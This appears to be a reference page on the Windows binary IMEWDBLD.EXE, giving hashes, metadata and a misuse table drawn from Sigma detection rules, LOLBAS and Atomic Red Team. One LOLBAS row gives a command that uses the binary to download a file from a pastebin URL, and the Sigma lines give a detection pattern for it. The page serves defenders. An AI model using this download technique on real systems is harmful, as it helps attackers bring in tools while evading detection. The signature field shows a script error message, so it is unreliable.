IMEWDBLD.EXE

  • File Path: C:\windows\system32\IME\SHARED\IMEWDBLD.EXE
  • Description: Microsoft IME Open Extended Dictionary Module

Hashes

| Type | Hash |
|------|------|
| MD5 | 8850DBB08A9158F8488E1D7DA2A62E6F |
| SHA1 | 3D37A1BE298A38F4AA0934EB85BB32257E7C2CF0 |
| SHA256 | 69D9BE75C7F403B13D7D3344E5BD8244DE16CB2877D95C0715591419AED71FA4 |
| SHA384 | 68348EF39F951A1EC61B2180E5FF46A9E84168DA6874405FB3D8D0A20918A3C5252B551B38EE87A138D65142C078B7A3 |
| SHA512 | 2C7D5B780B481C307589B2CF77642BB72CF416DEB0BAF84D400FC1EF40EAC28C71955E3F1607E7114E94B3FF6785D1BB31045D12B9A1B6EC715D8877C49AB039 |
| SSDEEP | 12288:B6uUP+1T+Qp5C0M0hdX+SXCoeVK90v+7Gs/r:0k1T+Q/i0hDSHNrs/ |

Signature

  • Status: The file C:\windows\system32\IME\SHARED\IMEWDBLD.EXE is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial: ``
  • Thumbprint: ``
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: imewdbld.exe
  • Product Name: Microsoft IME 2012
  • Company Name: Microsoft Corporation
  • File Version: 15.0.9600.18514
  • Product Version: 15.0.9600.18514
  • Language: Language Neutral
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of IMEWDBLD.EXE being misused. While IMEWDBLD.EXE is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

| Source | Source File | Example | License |
|--------|-------------|---------|---------|
| sigma | net_connection_win_imewdbld.yml | title: Download a File with IMEWDBLD.exe | DRL 1.0 |
| sigma | net_connection_win_imewdbld.yml | description: Use IMEWDBLD.exe (built-in to windows) to download a file | DRL 1.0 |
| sigma | net_connection_win_imewdbld.yml | Image\|endswith: '\IMEWDBLD.exe' | DRL 1.0 |
| LOLBAS | IMEWDBLD.yml | Name: IMEWDBLD.exe | |
| LOLBAS | IMEWDBLD.yml | - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw | |
| LOLBAS | IMEWDBLD.yml | Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at that URL and save it to `%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>` or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>` | |
| LOLBAS | IMEWDBLD.yml | - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe | |
| atomic-red-team | index.md | - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | - Atomic Test #17 - Download a file with IMEWDBLD.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | ## Atomic Test #17 - Download a file with IMEWDBLD.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | $imewdbled = $env:SystemRoot + “\System32\IME\SHARED\IMEWDBLD.exe” | MIT License. © 2018 Red Canary |

MIT License. Copyright (c) 2020-2021 Strontic.